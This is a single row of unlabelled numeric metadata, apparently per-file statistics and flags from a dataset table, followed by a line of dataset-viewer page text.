| 31.850575 | 80 | 0.709491 | 344 | 2,771 | 5.386628 | 0.104651 | 0.203994 | 0.092283 | 0.101997 | 0.928764 | 0.910955 | 0.910955 | 0.910955 | 0.910955 | 0.910955 | 0 | 0.004386 | 0.177192 | 2,771 | 86 | 81 | 32.22093 | 0.808333 | 0.010105 | 0 | 0.631579 | 0 | 0 | 0.170928 | 0.084733 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157895 | false | 0 | 0.052632 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.